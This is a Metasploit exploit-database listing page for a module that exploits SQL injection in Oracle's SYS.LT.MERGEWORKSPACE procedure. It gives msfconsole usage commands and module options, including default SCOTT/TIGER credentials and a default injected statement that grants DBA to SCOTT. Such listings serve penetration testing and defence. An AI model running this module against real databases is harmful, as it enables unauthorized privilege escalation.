Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE | Metasploit Exploit Database (DB)

Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE

This module exploits an sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.

Search Other Modules


Rank

  • Normal

Authors

  • CG < cg [at] carnal0wnage.com >

Vulnerability References


Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/sqli/oracle/lt_mergeworkspace
msf auxiliary(lt_mergeworkspace) > set RHOST [TARGET IP]
msf auxiliary(lt_mergeworkspace) > run


Module Options

DBPASS The password to authenticate with. (default: TIGER)
DBUSER The username to authenticate with. (default: SCOTT)
RHOST The Oracle host. (default: )
RPORT The TNS port. (default: 1521)
SID The sid to authenticate with. (default: ORCL)
SQL SQL to execte. (default: GRANT DBA to SCOTT)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module